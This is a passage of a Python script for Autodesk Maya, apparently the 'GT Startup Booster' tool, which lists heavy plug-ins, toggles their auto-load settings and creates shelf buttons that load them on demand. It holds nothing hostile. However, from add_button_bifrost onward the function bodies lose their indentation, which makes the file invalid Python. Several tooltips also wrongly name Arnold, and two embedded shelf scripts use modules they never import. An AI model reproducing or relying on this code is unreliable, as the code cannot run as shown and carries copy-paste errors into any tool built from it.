    cmds.text('Boss_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('Boss_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))
    cmds.text('"bifmeshio.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('bifmeshio_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('bifmeshio_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))
    cmds.text('"bifrostGraph.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('bifrostGraph_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('bifrostGraph_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))
    cmds.text('"bifrostvisplugin.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('bifrostvisplugin_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('bifrostvisplugin_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))
    cmds.text('"mayaVnnPlugin.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('mayaVnnPlugin_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('mayaVnnPlugin_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))
    cmds.text('"bifrostshellnode.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('bifrostshellnode_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('bifrostshellnode_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bifrost', bgc=(.3, .3, .3))

    # Bullet
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"AbcBullet.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('AbcBullet_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('AbcBullet_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bullet', bgc=(.3, .3, .3))
    cmds.text('"bullet.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('bullet_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('bullet_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Bullet', bgc=(.3, .3, .3))

    # MASH
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"MASH.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('MASH_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('MASH_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='MASH', bgc=(.3, .3, .3))

    # xGen
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"xgenToolkit.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('xgenToolkit_autoload', label='... ', bgc=(.2, .2, .2))
    cmds.text('xgenToolkit_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='xGen', bgc=(.3, .3, .3))

    cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1, 10)])
    cmds.separator(h=5)
    cmds.separator(h=15, style='none')  # Empty Space

    # Per-renderer action buttons (Shelf Button creators + Auto Load toggles)
    cell_size = 103
    cmds.rowColumnLayout(p=content_main, numberOfColumns=3,
                         columnWidth=[(1, cell_size), (2, cell_size), (3, cell_size), (4, cell_size), (5, cell_size), (6, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5), (5, 5), (6, 5)])
    btns_height = 20
    btns_bgc = (.2, .2, .2)
    cmds.text('- Arnold -', bgc=btns_bgc)
    cmds.text('- Redshift -', bgc=btns_bgc)
    cmds.text('- Bifrost -', bgc=btns_bgc)
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading Arnold plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_arnold(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading Redshift plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_redshift(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading Bifrost plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_bifrost(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for Arnold.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_arnold(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for Redshift.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_redshift(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for Bifrost.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_bifrost(), font='tinyBoldLabelFont')

    cmds.separator(h=3, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=3,
                         columnWidth=[(1, cell_size), (2, cell_size), (3, cell_size), (4, cell_size), (5, cell_size), (6, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5), (5, 5), (6, 5)])
    cmds.text('- Bullet -', bgc=btns_bgc)
    cmds.text('- MASH -', bgc=btns_bgc)
    cmds.text('- xGen -', bgc=btns_bgc)
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading Bullet plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_bullet(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading MASH plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_mash(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading xGen plugins.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_xgen(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for Bullet.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_bullet(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for MASH.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_mash(), font='tinyBoldLabelFont')
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='redrawPaintEffects.png', label=' Auto Load',
                        statusBarMessage='This button will toggle the auto load option for xGen.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: toggle_startup_booster_xgen(), font='tinyBoldLabelFont')

    # Custom plug-in text field + shelf-button creator
    cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1, 10)])
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 210)], cs=[(1, 10), (2, 5)])
    custom_plugin_input = cmds.textField(pht=" Other Plugins (use comma for multiple)",
                                         enterCommand=lambda x: add_button_custom(cmds.textField(custom_plugin_input, q=True, text=True)),
                                         font='smallBoldLabelFont')
    # Fixed copy-pasted status message (previously said "xGen plugins")
    cmds.iconTextButton(style='iconAndTextHorizontal', image1='openScript.png', label=' Shelf Button',
                        statusBarMessage='This button creates a shelf button for auto loading the plugins typed in the text field.',
                        olc=[1, 0, 0], enableBackground=True, bgc=btns_bgc, h=btns_height, marginWidth=10,
                        command=lambda: add_button_custom(cmds.textField(custom_plugin_input, q=True, text=True)), font='tinyBoldLabelFont')

    # Bottom buttons
    cmds.rowColumnLayout(p=content_main, numberOfColumns=6, columnWidth=[(1, 318)], cs=[(1, 10)])
    cmds.separator(h=5)
    cmds.separator(h=15, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=3, columnWidth=[(1, 157), (2, 157), (3, 10)], cs=[(1, 10), (2, 5), (3, 5)])
    cmds.separator(h=10, p=content_main, st="none")
    cmds.button(l="Refresh", c=lambda x: refresh_startup_booster_ui(), w=100, bgc=(.6, .6, .6))
    cmds.button(l="Optimize", c=lambda x: optimize_all_plugins(), bgc=(.6, .6, .6))
    cmds.separator(h=10, st="none")
def refresh_startup_booster_ui(plugins_to_load=None):
    '''
    Refresh the UI to show the current state of the plug-ins.

    Attempts to load each plug-in (quietly) to detect whether it is installed,
    then updates the 'autoload' and 'loaded' text cells of the plug-in table.
    Shows an interruptible progress bar while it works.

    Parameters:
        plugins_to_load (list): A list of plug-in names (strings) to refresh.
                                If not provided, refreshes all known plug-ins.
    '''
    active_bgc = (.5, 0, 0)
    inactive_bgc = (0, .5, 0)
    loaded_bgc = (0, .5, 0)
    not_loaded_bgc = (.2, .2, .2)
    not_installed_bgc = (.2, .2, .2)
    plugins = ['mtoa', 'redshift4maya', 'bifmeshio', 'bifrostGraph', 'bifrostshellnode',
               'bifrostvisplugin', 'Boss', 'mayaVnnPlugin', 'AbcBullet', 'bullet', 'MASH', 'xgenToolkit']
    if plugins_to_load:
        plugins = plugins_to_load

    gMainProgressBar = mel.eval('$tmp = $gMainProgressBar')
    # Fixed: status string previously contained a stray '"' character
    cmds.progressBar(gMainProgressBar,
                     edit=True,
                     beginProgress=True,
                     isInterruptable=True,
                     status='Loading Plug-ins...',
                     maxValue=len(plugins))
    for plugin in plugins:
        if cmds.progressBar(gMainProgressBar, query=True, isCancelled=True):
            break
        # Loading the plug-in is how installation is detected: a missing
        # plug-in makes pluginInfo/loadPlugin raise.
        is_plugin_installed = True
        try:
            if not cmds.pluginInfo(plugin, query=True, loaded=True):
                cmds.loadPlugin(plugin, quiet=True)
        except Exception:
            is_plugin_installed = False
        if is_plugin_installed:
            # Auto Load
            if cmds.pluginInfo(plugin, q=True, autoload=True):
                cmds.text(plugin + '_autoload', e=True, label='Active', bgc=active_bgc)
            else:
                cmds.text(plugin + '_autoload', e=True, label='Inactive', bgc=inactive_bgc)
            # Loaded (Installed)
            if cmds.pluginInfo(plugin, q=True, loaded=True):
                cmds.text(plugin + '_loaded', e=True, label='Yes', bgc=loaded_bgc)
            else:
                cmds.text(plugin + '_loaded', e=True, label='No', bgc=not_loaded_bgc)
        else:
            cmds.text(plugin + '_autoload', e=True, label='...', bgc=not_installed_bgc)
            cmds.text(plugin + '_loaded', e=True, label='No', bgc=not_installed_bgc)
        cmds.progressBar(gMainProgressBar, edit=True, step=1)
    cmds.progressBar(gMainProgressBar, edit=True, endProgress=True)
def toggle_startup_booster_arnold():
    ''' Toggle the auto load checkbox for the Arnold plugin '''
    plugin_name = 'mtoa'
    # Refresh first so the queried state reflects reality before toggling
    refresh_startup_booster_ui([plugin_name])
    plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
    if plugin_status:
        cmds.pluginInfo(plugin_name, e=True, autoload=False)
    else:
        cmds.pluginInfo(plugin_name, e=True, autoload=True)
    # Refresh again so the table shows the new auto-load state
    refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_redshift():
    ''' Toggle the auto load checkbox for the Redshift plugin '''
    plugin_name = 'redshift4maya'
    # Sync the UI with the real state before reading it
    refresh_startup_booster_ui([plugin_name])
    is_autoload_on = cmds.pluginInfo(plugin_name, q=True, autoload=True)
    # Flip the auto-load flag to the opposite of its current value
    cmds.pluginInfo(plugin_name, e=True, autoload=not is_autoload_on)
    refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_bifrost():
    ''' Toggle the auto load checkbox for the Bifrost plugin '''
    plugin_names = ['bifmeshio', 'bifrostGraph', 'bifrostshellnode', 'bifrostvisplugin', 'Boss', 'mayaVnnPlugin']
    refresh_startup_booster_ui(plugin_names)
    # 'bifrostGraph' acts as the reference plug-in for the group's current state
    target_state = not cmds.pluginInfo('bifrostGraph', q=True, autoload=True)
    for plugin_file in plugin_names:
        cmds.pluginInfo(plugin_file, e=True, autoload=target_state)
    refresh_startup_booster_ui(plugin_names)
def toggle_startup_booster_bullet():
    ''' Toggle the auto load checkbox for the Bullet plugin '''
    plugin_names = ['AbcBullet', 'bullet']
    refresh_startup_booster_ui(plugin_names)
    # 'bullet' acts as the reference plug-in for the group's current state
    target_state = not cmds.pluginInfo('bullet', q=True, autoload=True)
    for plugin_file in plugin_names:
        cmds.pluginInfo(plugin_file, e=True, autoload=target_state)
    refresh_startup_booster_ui(plugin_names)
def toggle_startup_booster_mash():
    ''' Toggle the auto load checkbox for the MASH plugin '''
    plugin_name = 'MASH'
    # Sync the UI with the real state before reading it
    refresh_startup_booster_ui([plugin_name])
    is_autoload_on = cmds.pluginInfo(plugin_name, q=True, autoload=True)
    # Flip the auto-load flag to the opposite of its current value
    cmds.pluginInfo(plugin_name, e=True, autoload=not is_autoload_on)
    refresh_startup_booster_ui([plugin_name])
def toggle_startup_booster_xgen():
    ''' Toggle the auto load checkbox for the xGen plugin '''
    plugin_name = 'xgenToolkit'
    # Refresh first so the queried state reflects reality before toggling
    refresh_startup_booster_ui([plugin_name])
    plugin_status = cmds.pluginInfo(plugin_name, q=True, autoload=True)
    if plugin_status:
        cmds.pluginInfo(plugin_name, e=True, autoload=False)
    else:
        cmds.pluginInfo(plugin_name, e=True, autoload=True)
    # Refresh again so the table shows the new auto-load state
    refresh_startup_booster_ui([plugin_name])
def optimize_all_plugins():
    '''
    Deactivate auto load for all heavy plug-ins.

    Best-effort: plug-ins that are not installed raise when edited, and are
    simply skipped. Refreshes the UI before and after, then notifies the user.
    '''
    refresh_startup_booster_ui()
    plugins = ['mtoa', 'redshift4maya', 'bifmeshio', 'bifrostGraph', 'bifrostshellnode',
               'bifrostvisplugin', 'Boss', 'mayaVnnPlugin', 'AbcBullet', 'bullet', 'MASH', 'xgenToolkit']
    for plugin in plugins:
        try:
            cmds.pluginInfo(plugin, e=True, autoload=False)
        except Exception:
            # Plug-in not installed - skip it (was a bare `except:`, which would
            # also have swallowed KeyboardInterrupt/SystemExit)
            pass
    refresh_startup_booster_ui()
    message = 'All heavy plugins have been optimized to not open automatically.'
    cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
    sys.stdout.write(message)
def add_button_arnold():
    ''' Create a button for manually loading the Arnold plugin '''
    # The first argument is the complete Python source that the generated shelf
    # button will execute: it defines gtu_load_plugins() and calls it on ['mtoa'].
    # NOTE(review): unlike the Bifrost variant, this embedded script does not
    # include "import maya.cmds as cmds" / "import sys" even though it uses both -
    # presumably the shelf environment provides them; confirm before relying on it.
    create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nplugins_to_load = ['mtoa']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)",
    label='Arnold', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
    cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Arnold</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_redshift():
    ''' Create a button for manually loading the Redshift plugin '''
    # The first argument is the complete Python source that the generated shelf
    # button will execute: it defines gtu_load_plugins() and calls it on
    # ['redshift4maya'].
    # NOTE(review): the embedded script uses "cmds" and "sys" without importing
    # them (the Bifrost variant embeds the imports) - presumably the shelf
    # environment provides them; confirm before relying on it.
    # NOTE(review): the tooltip below says "load Arnold" - looks like a
    # copy-paste from add_button_arnold; should probably say "Redshift".
    create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\n\nplugins_to_load = ['redshift4maya']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
    label='RS', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
    cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Redshift</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_bifrost():
''' Create a button for manually loading the Bifrost plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['bifmeshio', 'bifrostGraph', 'bifrostshellnode', 'bifrostvisplugin', 'Boss', 'mayaVnnPlugin']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n 
for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='Bifrost', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Bifrost</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_bullet():
''' Create a button for manually loading the Bullet plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['AbcBullet', 'bullet']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 
'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)",
label='Bullet', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">Bullet</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_mash():
''' Create a button for manually loading the MASH plugin '''
